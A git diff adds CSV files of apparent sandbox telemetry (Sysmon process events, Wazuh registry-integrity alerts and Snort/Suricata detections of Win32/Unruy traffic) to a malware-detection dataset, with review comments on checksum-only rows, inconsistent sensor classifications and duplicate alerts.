C:\\Windows\\SysWOW64\\taskkill.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Terminates Processes\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: taskkill.exe\r\nCommandLine: \""C:\\Windows\\System32\\taskkill.exe\"" /F /IM LdBoxSVC.exe /T\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=07D18817187E87CFC6AB2A4670061AE0,SHA256=89D9BDF537EC43228448187779299AC347449361E067B0AD453BB54AD7EDB37E,IMPHASH=0D3E23DCB6BF63A9EB90D5BED57B4F89\r\nParentProcessGuid: {df9fc3d3-b396-5ecf-0000-00105c1f1d00}\r\nParentProcessId: 7284\r\nParentImage: C:\\ChangZhi\\LDPlayer\\LDPlayer.exe\r\nParentCommandLine: 
\""C:\\ChangZhi\\LDPlayer\\\\LDPlayer.exe\"" -silence -downloader -openid=100 -path=\""C:\\ChangZhi\\LDPlayer\\\""\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:35.812"",""processGuid"":""{df9fc3d3-b39b-5ecf-0000-001001d41d00}"",""processId"":""7256"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\taskkill.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Terminates Processes"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""taskkill.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\taskkill.exe\\\"" /F /IM LdBoxSVC.exe /T"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=07D18817187E87CFC6AB2A4670061AE0,SHA256=89D9BDF537EC43228448187779299AC347449361E067B0AD453BB54AD7EDB37E,IMPHASH=0D3E23DCB6BF63A9EB90D5BED57B4F89"",""parentProcessGuid"":""{df9fc3d3-b396-5ecf-0000-00105c1f1d00}"",""parentProcessId"":""7284"",""parentImage"":""C:\\\\ChangZhi\\\\LDPlayer\\\\LDPlayer.exe"",""parentCommandLine"":""\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\\\\\LDPlayer.exe\\\"" -silence -downloader -openid=100 -path=\\\""C:\\\\ChangZhi\\\\LDPlayer\\\\\\\""""}}}", diff --git a/data/MW_31_NIDS.csv b/data/MW_31_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_31_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_32_HIDS_3.csv b/data/MW_32_HIDS_3.csv new file mode 100644 index 0000000..8391e3f --- /dev/null +++ b/data/MW_32_HIDS_3.csv 
@@ -0,0 +1,28 @@
+timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details"
+"May 31, 2020 @ 14:49:54.640",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed.
+Old md5sum was: '5002e9cbd059c227b20768b5773a5158'
+New md5sum is : '5180a3b0722c82316724334d9433e623'
+Old sha1sum was: 'd451102b00da6ad0bf180b4f73a88db73c0000e8'
+New sha1sum is : 'fec2fcb119fff56cdc62ef38a54b5875d12dee87'
+",
+"May 31, 2020 @ 14:49:54.610",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '4106a3aec9d1eebddfcfbf931654376c'
+New md5sum is : 'ab54055d4340717a94412ced486155e6'
+Old sha1sum was: 'dbffbab9a0cf7bfda50a68d20d36c21299d2169d'
+New sha1sum is : 'f08b082e962682e26ea4772b2010776e1eafced1'
+",
+"May 31, 2020 @ 14:49:50.313",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed.
+Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa'
+New md5sum is : '1c729912f87f9abbd1574176fc5996f7'
+Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b'
+New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0'
+",
+"May 31, 2020 @ 14:48:27.933",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,,
+"May 31, 2020 @ 14:48:18.785",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,,
+"May 31, 2020 @ 14:46:57.263",7,"Integrity checksum changed.",,,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed.
+Old md5sum was: '6491bfbb48f449e8ef2da21bf4925908'
+New md5sum is : 'c1e81fff51d7a32e2fdecbd74d4a1e36'
+Old sha1sum was: 'a659aa851c1408487eefa829ad359673b7fb1288'
+New sha1sum is : '49a93a3b033356aaf5c778d70b915ce41c083b45'
+",
+"May 31, 2020 @ 14:45:50.819",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 1440; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory WHERE Tag='Physical Memory 0'; ResultCode = 0x80041032; PossibleCause = Unknown""",,,,
diff --git a/data/MW_32_NIDS.csv b/data/MW_32_NIDS.csv
new file mode 100644
index 0000000..90042ce
--- /dev/null
+++ b/data/MW_32_NIDS.csv
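Review bot: The two most security-relevant rows in this file — the `HKLM\...\Winlogon` key change at 14:49:54 and the `HKLM\...\CurrentVersion\Run` key change at 14:46:57 — are recorded only as old/new md5 and sha1 of the key, so the file never says which value was added or altered; an analyst cannot tell from this data alone whether a Run entry or an autologon value was written. The level-9 benchmark row at 14:48:27 (AutoAdminLogon check flipping from 'not applicable' to failed) sits between those two changes and makes a Winlogon/autologon modification plausible, but that is an inference the rows do not confirm. Consider noting in the dataset README that the HIDS_3 FIM rows carry checksums only (no changed-value reporting), and that `full_log` is a multi-line quoted field, so consumers must use a quote-aware CSV parser rather than splitting on newlines.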
@@ -0,0 +1,7 @@
+"@timestamp",message,"log.file.path"
+"May 31, 2020 @ 14:45:37.543","05/31-14:45:36.564461 [**] [1:2833818:3] ETPRO MALWARE Win32/Unruy Rogue Search Host Observed 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50104 -> 35.186.238.101:80","/var/log/snort/alert.fast"
+"May 31, 2020 @ 14:45:37.524","05/31/2020-14:45:36.661787 [**] [1:2833818:3] ETPRO ADWARE_PUP Win32/Unruy Rogue Search Host Observed 2 [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50104 -> 35.186.238.101:80","/var/log/suricata/fast.log"
+"May 31, 2020 @ 14:44:57.514","05/31/2020-14:44:55.725718 [**] [1:2833817:3] ETPRO ADWARE_PUP Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50037 -> 35.186.238.101:80","/var/log/suricata/fast.log"
+"May 31, 2020 @ 14:44:57.514","05/31-14:44:55.628541 [**] [1:2833817:3] ETPRO MALWARE Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50037 -> 35.186.238.101:80","/var/log/snort/alert.fast"
+"May 31, 2020 @ 14:44:54.512","05/31/2020-14:44:53.277765 [**] [1:2833817:3] ETPRO ADWARE_PUP Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50023 -> 35.186.238.101:80","/var/log/suricata/fast.log"
+"May 31, 2020 @ 14:44:54.511","05/31-14:44:53.177467 [**] [1:2833817:3] ETPRO MALWARE Win32/Unruy Rogue Search Host Observed 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50023 -> 35.186.238.101:80","/var/log/snort/alert.fast"
diff --git a/data/MW_3_HIDS_1.csv b/data/MW_3_HIDS_1.csv
new file mode 100644
index 0000000..77fdd45
--- /dev/null
+++ b/data/MW_3_HIDS_1.csv
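Review bot: The same signature IDs (1:2833817:3 and 1:2833818:3) are classified differently by the two sensors in this file — Snort's `alert.fast` rows say `ETPRO MALWARE ... [Classification: A Network Trojan was detected] [Priority: 1]` while Suricata's `fast.log` rows say `ETPRO ADWARE_PUP ... [Classification: Possibly Unwanted Program Detected] [Priority: 2]` for the identical flow — which indicates the two engines are running different revisions of the ET Pro ruleset or classification config, so a "NIDS detected" verdict derived from this file depends on which sensor is counted. Every flow also appears twice (once per sensor), so alert counts must be deduplicated on SID plus 5-tuple before being compared with other samples. The Snort timestamps (`05/31-14:45:36.564461`) omit the year while Suricata's (`05/31/2020-14:45:36.661787`) include it, so anyone parsing the `message` column needs two formats; a short note in the dataset README on sensor/ruleset versions and this duplication would make the Result_NIDS column reproducible.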
@@ -0,0 +1,637 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 15:21:58.873",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'a42aba8bfc3fa20348a9721ae0ca3460' +New md5sum is : '192c78418fb597c9cf6128a0792f79aa' +Old sha1sum was: 'e9eb87c9f46d8fb813cc6fdd1b8c16b59b46ad4f' +New sha1sum is : 'c9aa48747848a82c29d96f119a4b1209deec6497' +" +"Apr 4, 2020 @ 15:21:58.855",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'b0509f8ae7589a36b0e922ea55370a2a' +New md5sum is : 'd65ee627cdc29661ff2de1939cdd428b' +Old sha1sum was: '7c173f25809414b691ff85859d444a8615734f04' +New sha1sum is : '115611e9c69eb0bb2ce1573caa4b9500ca07e3ee' +" +"Apr 4, 2020 @ 15:21:55.371",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:55.354",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:48.385",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '0537eac2a8f888ccfe2ff7c9cb88eba4' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '011c9cae6591b6ed5bc8cf0ad3eebcd91c70322c' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +" +"Apr 4, 2020 @ 15:21:48.356",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'df9be7629f6b4bb426436fddfdda3e00' +New md5sum is : 'b919215c1cb7c2c9b5ca2a5dcb9cdede' +Old sha1sum was: '27944b26d8cfd2e43728eb7197de1c8f824a233d' +New sha1sum is : 'b64c8005bb43c0f56d3b57f7a3664059577f794e' +" +"Apr 4, 2020 @ 15:21:48.325",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'eef4559e7fd1bceae06925bdc22dd84b' +New md5sum is : 'c6fd10eeaa5117c25b87d0cf58c03329' +Old sha1sum was: '5e9ea0459e03ac8fca6d6a6e915584a6d0419d0a' +New sha1sum is : 'c017e56700c44e16721f94431d25c19503937da0' +" +"Apr 4, 2020 @ 15:21:47.901",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\Config' checksum changed. +Old md5sum was: '1a84f72dabd954f40c6c8b3797efe69e' +New md5sum is : '16f1307dee1a5c080b4690a068293d01' +Old sha1sum was: 'b71e6aac68f5b97f000e7e4cb61948fc0911b20c' +New sha1sum is : '2556215c3fc2ed705fcd1350dae945c7a9be0a7c' +" +"Apr 4, 2020 @ 15:21:47.683",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '70803ff74c6137bb9c30faef6663c67e' +New md5sum is : '1f5f47a432707b7a9ceb822363299e78' +Old sha1sum was: '6fcc6a87284459c8396289b99fe1d19b455650f3' +New sha1sum is : '769c33f5c4fca3518398159bd417f442803c5d9b' +" +"Apr 4, 2020 @ 15:21:46.592",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:21:46.262",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1935e9f379e872308a49f6d8f4863bc5' +New md5sum is : 'e9d96c4f08fa655c42db7df4a5acb08c' +Old sha1sum was: 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +New sha1sum is : '8e7fbf7b3eb684559c3317fee8a56fc267f4a434' +" +"Apr 4, 2020 @ 15:21:45.980",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '96f3da64bf19dc1bd781394ccce1fbeb' +New md5sum is : '759d28f3c4daf9bd3a1b6167e51768f0' +Old sha1sum was: 'd27fb1d8e05747b9210064f64aa3c8d84f5e96a6' +New sha1sum is : '538d88752a9e2247561c2c1bcc242887a2f14a8b' +" +"Apr 4, 2020 @ 15:21:45.293",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:45.280",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:45.155",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '44e16df733261010319c89f3decf1694' +New md5sum is : 'dd770a92bcb4d716d1fff91aba0a204e' +Old sha1sum was: 'b18203806fe0dae10954bb7bb39c25b8b0d4e978' +New sha1sum is : 'f0f01b5151126b20a75ccdd550d126c6542fdef6' +" +"Apr 4, 2020 @ 15:21:44.995",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '4559d805700630cd4bcb2f3aec755c25' +New md5sum is : 'd7f681bed4f556d2db6534fdfc35d91d' +Old sha1sum was: '058f1b6c28e41a92ba1b747585b9ac8a56baec34' +New sha1sum is : '0ad5cfd8da8bfd2beb511d8a1f337f5091029df9' +" +"Apr 4, 2020 @ 15:21:44.604",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2b7cd' was added. 
+" +"Apr 4, 2020 @ 15:21:44.574",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:44.058",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '1935e9f379e872308a49f6d8f4863bc5' +New md5sum is : '80751be84fe783fc4c0bc870838a3434' +Old sha1sum was: 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +New sha1sum is : '1c2b3822d9de8136120a203722a5860b3c368348' +" +"Apr 4, 2020 @ 15:21:40.635",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '4c3f002c2542e6c47bd1e5d5526ad531' +New md5sum is : 'ab91aa026c192dd4aa68d5f026066612' +Old sha1sum was: '00ea6b590c5fa5bcac5c671a151c31127ac60089' +New sha1sum is : 'a0938a8d4d20576317a2d3d5115857097801bba3' +" +"Apr 4, 2020 @ 15:21:37.875",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 15:21:37.277",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '5d8658099109c05a39f0550c9fe2078d' +New md5sum is : '3d3a643354245020081ae89e531e5f43' +Old sha1sum was: 'bd60f0594b3758e2b86084c77d5b75b32d4df8b1' +New sha1sum is : '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +" +"Apr 4, 2020 @ 15:21:35.605",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. 
+Old md5sum was: '4ec372e5c956917c47740315de22f258' +New md5sum is : 'd821b0451d0ccaee48c2e3056715cfa6' +Old sha1sum was: '1ebd67340dfc660448dc620eb68e7fb4cf9c565a' +New sha1sum is : '17c9c5437458287926b0cdd4cf95a72ba80b7cb0' +" +"Apr 4, 2020 @ 15:21:35.058",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'e25d33057cf71b330830d5e95b124fe5' +New md5sum is : '3c9907f337ed2c00e7706d077193eb81' +Old sha1sum was: '624751317ab817d1c615abbd24c010d370e34268' +New sha1sum is : 'c77498926ea2ec4a1f354669f5a247c764d2ad51' +" +"Apr 4, 2020 @ 15:21:35.011",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '06e3a0893e8471fe1ad4937da2a83d5f' +New md5sum is : '5de0ef21cee3c7b87f2fab30b8b06e2e' +Old sha1sum was: '0b07d04f35b9382f85cdc6152e8d39398c1f055b' +New sha1sum is : '95450da791d27d0a0e456663988211c24b30dbec' +" +"Apr 4, 2020 @ 15:21:34.995",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '5fb1e28e9e1ea88c6ada6523c4164966' +New md5sum is : '0b017ce491fd1b22003082d2585a1327' +Old sha1sum was: 'd1f49ffeb1bbc4493fe5bce52eaf75cccf81560c' +New sha1sum is : 'aba803556e14ebf646bb03cbc539cb30b783ee41' +" +"Apr 4, 2020 @ 15:21:30.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'a790734f197ecec9285de0c7c3ee54a1' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '2a056b4354493d8181a6997a08b72094f1778f22' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +" +"Apr 4, 2020 @ 15:21:28.213",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2b7cd' was added. 
+" +"Apr 4, 2020 @ 15:21:28.198",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:27.527",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:27.509",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:26.308",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:26.288",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:22.128",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3afaf17706b569cfc181c32e11e3e1e3' +New md5sum is : 'a0da4edfc8c86d5c2f328cbea9d3d099' +Old sha1sum was: '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +New sha1sum is : 'bf485c9d0d54845bee69171208deaf1995e19353' +" +"Apr 4, 2020 @ 15:21:18.061",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: '582b366b698c74fe5d3e40a47e1b8010' +New md5sum is : 'f079a7c2cde745dfaa7735dccfd02c41' +Old sha1sum was: '8961c68f641a2a7819a49e53b3c6e5e24bcee551' +New sha1sum is : 'f8cf1f3dcf5c617ee8d59ad6a81a619341529bc2' +" +"Apr 4, 2020 @ 15:21:16.803",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. 
+Old md5sum was: '1f292403ac7b268e3b11f111ded67e2c' +New md5sum is : 'c5eb944f3cdfc8f8d032d5b0468dfb60' +Old sha1sum was: 'c336ebf7d883f128c8920b416859ef494e2e018c' +New sha1sum is : 'db662f811919aeadcded022158babc95bac56752' +" +"Apr 4, 2020 @ 15:21:16.635",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2b7cd' was added. +" +"Apr 4, 2020 @ 15:21:16.606",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2b7cd\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 15:21:16.533",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:21:10.969",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '1e18b407d6fa2ba2ca94f603ba4f26b4' +New md5sum is : '811afeeeaebe9434f2200e491b65992c' +Old sha1sum was: '0df5dd168081c6678164f4e60dce87117ddfa87e' +New sha1sum is : '38c8fba2ccf9a7f7ec0e12aebb8ddd91eb350900' +" +"Apr 4, 2020 @ 15:21:09.607",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '3afaf17706b569cfc181c32e11e3e1e3' +New md5sum is : 'a0da4edfc8c86d5c2f328cbea9d3d099' +Old sha1sum was: '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +New sha1sum is : 'bf485c9d0d54845bee69171208deaf1995e19353' +" +"Apr 4, 2020 @ 15:21:06.841",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'da7d5ec8cdd7285f49105e5efe9c6bb8' +New md5sum is : '6755fd8126a3ec89524601d2953e0be3' +Old sha1sum was: 'eb0efa8d18c93a3996afdf9ff649e81a5d40b033' +New sha1sum is : '290387848f6b7d7ef055483799ff8a0ac26b6663' +" +"Apr 4, 2020 @ 15:21:06.081",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '3afaf17706b569cfc181c32e11e3e1e3' +New md5sum is : 'a0da4edfc8c86d5c2f328cbea9d3d099' +Old sha1sum was: '4d4da11dce9a318cf536df3a5f5d41a6c41f70dd' +New sha1sum is : 'bf485c9d0d54845bee69171208deaf1995e19353' +" +"Apr 4, 2020 @ 15:21:05.060",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '180219dd3d5cd4e9bd4f437e6b975dc1' +New md5sum is : '8babdce3ab05d3473a80df927d06237f' +Old sha1sum was: 'c8b4a3f4d649c55502e3e419db9da373945302cb' +New sha1sum is : 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +" +"Apr 4, 2020 @ 15:21:00.123",3,"Windows Logon Success", +"Apr 4, 2020 @ 15:20:55.047",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'c5c6ddae9a35331147842cd5448debe5' +New md5sum is : '752d02e3caedd553c0777cceab48739a' +Old sha1sum was: 'cba0805b3a87df3e8916c67705d47828f0618ed0' +New sha1sum is : 'd088d26eabd27ded9310455e6838e2296ba41013' +" +"Apr 4, 2020 @ 15:20:47.544",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '385c9184ac544829488be8ce5b5671ff' +New md5sum is : 'd48e4ad1513d228238afb53902df064f' +Old sha1sum was: 'fa617e764e334ea237bea1af00d403f462f50d6f' +New sha1sum is : '35582ea845e1fcd5f80387607ffae37f3b9bb20a' +" +"Apr 4, 2020 @ 15:20:46.091",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:46.075",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:46.013",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:45.997",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:45.748",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:45.732",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:45.184",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:45.169",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:44.982",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:44.966",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2b7cd\Security' was added. 
+" +"Apr 4, 2020 @ 15:20:44.825",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1935e9f379e872308a49f6d8f4863bc5' +New md5sum is : 'e9d96c4f08fa655c42db7df4a5acb08c' +Old sha1sum was: 'c9ae2d75231460ef4dab9ce1033d917d8630f141' +New sha1sum is : '8e7fbf7b3eb684559c3317fee8a56fc267f4a434' +" +"Apr 4, 2020 @ 15:20:43.606",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:43.591",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:43.424",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2b7cd' was added. +" +"Apr 4, 2020 @ 15:20:43.389",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2b7cd\Security' was added. +" +"Apr 4, 2020 @ 15:20:43.252",5,"File added to the system.","File 